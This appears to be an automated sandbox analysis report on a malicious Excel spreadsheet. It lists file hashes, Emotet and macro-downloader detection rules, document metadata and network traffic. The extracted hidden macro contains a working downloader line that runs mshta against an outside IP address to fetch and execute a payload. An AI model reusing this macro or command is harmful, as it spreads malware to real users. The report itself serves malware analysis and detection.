                                                                                                                        Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8016
                                                                                                                        Entropy (8bit):3.5832040477947182
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:chQCcMq+qvsqvJCwo5z8hQCcMq+qvsEHyqvJCworfzIuYbHyUVhxlUV7A2:ciHo5z8irHnorfzIQUVh+A2
                                                                                                                        MD5:A97322B899F5E5AD0F8A0677D238B727
                                                                                                                        SHA1:1D1CDD4012A8DD2E17DF676D5F6F44E3CD568046
                                                                                                                        SHA-256:BF7B5438ABB29F5D8A22244836A9FAF1290B1613C7884AB2B651AFDB12BD2033
                                                                                                                        SHA-512:2F91F611AAFF01D9513AD11C9470D452C50BAD0D59B4446F48C54184D0FABAE20ED26CA197AEA2299D2DCDF3879B9046BFB89F9B874FCC301548D8E107AAA0E2
                                                                                                                        Malicious:false
                                                                                                                        Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 21:52:19 2022, Last Saved Time/Date: Wed Jan 26 22:16:39 2022, Security: 0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):77312
                                                                                                                        Entropy (8bit):5.806410009760576
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:qI+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+xT:qI+HymsYk3hbdlylKsgqopeJBWhZFGk9
                                                                                                                        MD5:C05FE165227BA97C15FDEDCD3FE48136
                                                                                                                        SHA1:1A3A980F0B488987E969F95327DA024233642711
                                                                                                                        SHA-256:1D8F16C35A59415204D1C9226327A50069981AB0FA633F4149B76D8BE30C6709
                                                                                                                        SHA-512:D11D3E6852C431A2504237517F0045BB9C58B1BFC01F6625B781F9D347998558E591B0CF9185567D466015E3BCCB6EB00AC1A032D52EFBEA6A4402EF9D52BB0B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub.com_10.xls, Author: John Lambert @JohnLaTwC
                                                                                                                        • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub.com_10.xls, Author: Joe Security
                                                                                                                        • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\imedpub.com_10.xls, Author: ditekSHen
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):548864
                                                                                                                        Entropy (8bit):6.980507366834709
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:B2AavzUBPSczbeeTLjv8yMwWd3DYr6i64/:OUBPSczbeeTnvcZDWA
                                                                                                                        MD5:82A9CB505605589911CBC9284776BC8D
                                                                                                                        SHA1:A5418AF09BC7F2763494AAF001F98CA8EA058B07
                                                                                                                        SHA-256:7A4A00A0FD4DBF14780E1536313A65728FE875D3B05973043FE6A0F61DAADF4A
                                                                                                                        SHA-512:7A8E9C04512E11A60A3CB20945B063AE22EAE0184D4EBA6A6B8E3FAC24D039EE00F7CC9E6BEBD8CF4887A0FC3B706560DB6303FD5ED118862B21255B802D59DE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\Users\Public\Documents\ssd.dll, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: iMedPub LTD_10.xls, Detection: malicious, Browse
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):548864
                                                                                                                        Entropy (8bit):6.980507366834709
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:B2AavzUBPSczbeeTLjv8yMwWd3DYr6i64/:OUBPSczbeeTnvcZDWA
                                                                                                                        MD5:82A9CB505605589911CBC9284776BC8D
                                                                                                                        SHA1:A5418AF09BC7F2763494AAF001F98CA8EA058B07
                                                                                                                        SHA-256:7A4A00A0FD4DBF14780E1536313A65728FE875D3B05973043FE6A0F61DAADF4A
                                                                                                                        SHA-512:7A8E9C04512E11A60A3CB20945B063AE22EAE0184D4EBA6A6B8E3FAC24D039EE00F7CC9E6BEBD8CF4887A0FC3B706560DB6303FD5ED118862B21255B802D59DE
                                                                                                                        Malicious:false
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: iMedPub LTD_10.xls, Detection: malicious, Browse
                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 21:52:19 2022, Last Saved Time/Date: Wed Jan 26 22:16:39 2022, Security: 0
                                                                                                                        Entropy (8bit):5.792905808562405
                                                                                                                        TrID:
                                                                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                        File name:imedpub.com_10.xls
                                                                                                                        File size:77550
                                                                                                                        MD5:b7d1edc6031adb3dfb8b7a4489da9102
                                                                                                                        SHA1:fbb0c3649b1741de48c037cea19f088acad5c6a6
                                                                                                                        SHA256:6a9dd96ee5aeaedd9045f2bd76b3bd8d7f7b42cc37c46ad076791e33b1bb2fdc
                                                                                                                        SHA512:f1d2a2929f14730ca4ab19f289e33e5a196c8c4085348ea298b4b7f46589a4c18ef043edc76ad7bb344d210af954c7db9e329729f901c207262ab278c0ef5416
                                                                                                                        SSDEEP:1536:1I+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+x:1I+HymsYk3hbdlylKsgqopeJBWhZFGkz
                                                                                                                        Icon Hash:e4eea286a4b4bcb4
                                                                                                                        Document Type:OLE
                                                                                                                        Number of OLE Files:1
                                                                                                                        Has Summary Info:True
                                                                                                                        Application Name:Microsoft Excel
                                                                                                                        Encrypted Document:False
                                                                                                                        Contains Word Document Stream:False
                                                                                                                        Contains Workbook/Book Stream:True
                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                        Contains Visio Document Stream:False
                                                                                                                        Contains ObjectPool Stream:
                                                                                                                        Flash Objects Count:
                                                                                                                        Contains VBA Macros:True
                                                                                                                        Code Page:1251
                                                                                                                        Author:xXx
                                                                                                                        Last Saved By:xXx
                                                                                                                        Create Time:2022-01-26 21:52:19
                                                                                                                        Last Saved Time:2022-01-26 22:16:39
                                                                                                                        Creating Application:Microsoft Excel
                                                                                                                        Security:0
                                                                                                                        Document Code Page:1251
                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                        Company:
                                                                                                                        Contains Dirty Links:False
                                                                                                                        Shared Document:False
                                                                                                                        Changed Hyperlinks:False
                                                                                                                        Application Version:1048576
                                                                                                                        General
                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4096
                                                                                                                        Entropy:0.347239233907
                                                                                                                        Base64 Encoded:False
                                                                                                                        General
                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4096
                                                                                                                        Entropy:0.2647047667
                                                                                                                        Base64 Encoded:False
                                                                                                                        General
                                                                                                                        Stream Path:Workbook
                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                        Stream Size:66634
                                                                                                                        Entropy:6.37226949829
                                                                                                                        Base64 Encoded:True
                                                                                                                        Name:Macro1
                                                                                                                        Type:3
                                                                                                                        Final:False
                                                                                                                        Visible:False
                                                                                                                        Protected:False
                                                                                                                        Macro13False0Falsepost1,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,9,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.6,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.8,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.10,9,' Supported neglected met she therefore unwilling discovery remainder. 
Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.12,9,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.14,9,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.16,9,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.18,9,=EXEC("cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html")23,9,=HALT()
                                                                                                                        Name:Macro1
                                                                                                                        Type:3
                                                                                                                        Final:False
                                                                                                                        Visible:False
                                                                                                                        Protected:False
                                                                                                                        Macro13False0Falsepre1,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,9,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.6,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.8,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.10,9,' Supported neglected met she therefore unwilling discovery remainder. 
Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.12,9,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.14,9,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.16,9,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.18,9,=EXEC("cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html")23,9,=HALT()
Snort IDS alert:
• Timestamp: 01/28/22-20:52:27.917165, Protocol: TCP, SID: 2034631, Message: ET TROJAN Maldoc Activity (set), Source Port: 49166, Dest Port: 80, Source IP: 192.168.2.22, Dest IP: 91.240.118.168
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 28, 2022 20:52:28.087475061 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.087532997 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.098078966 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.098098040 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.162380934 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.162540913 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.175158024 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.175182104 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.175945044 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.381906033 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.382057905 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.464514017 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.505896091 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.517829895 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.517898083 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.517956972 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518073082 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518110037 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518198013 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518311977 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518357038 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518430948 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518441916 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518452883 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518467903 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518865108 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540488958 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540565014 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540652990 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540689945 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540716887 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540724993 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540889025 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540952921 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540970087 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540992022 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541009903 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541212082 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541444063 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541512012 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541531086 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541543961 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541560888 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541877031 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562359095 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562431097 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562530994 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562567949 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562589884 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562594891 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562597990 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562652111 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562661886 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562680006 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562720060 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562982082 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563046932 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563106060 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563106060 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563122988 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563153028 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563436985 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563494921 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563493967 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563512087 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563548088 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563601017 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563935041 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563987017 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563994884 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564012051 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564054966 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564429998 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564486027 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564486980 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564502001 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564536095 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564809084 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564981937 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.565040112 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.565042019 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.565056086 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.565098047 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.565964937 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584345102 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584425926 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584517956 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584537029 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584575891 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584598064 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584665060 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584669113 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584686041 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584732056 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584842920 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584913015 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584913969 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584930897 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584973097 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585031986 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585125923 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585196972 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585199118 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585216045 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585268021 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585413933 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585489035 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585508108 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585577011 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585705042 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585776091 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585777044 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585813046 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585870028 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585995913 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586066008 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586086988 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586100101 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586138010 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586229086 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586230993 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586249113 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586297989 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586303949 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586322069 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586370945 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586472988 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586549997 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586550951 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586568117 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586611986 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.587639093 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.587719917 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.587745905 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.587759018 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.587800980 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.588675976 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611224890 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611308098 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611363888 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611377954 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611394882 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611401081 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611516953 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611584902 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611598015 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611618996 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611675024 CET49167443192.168.2.2294.130.116.76
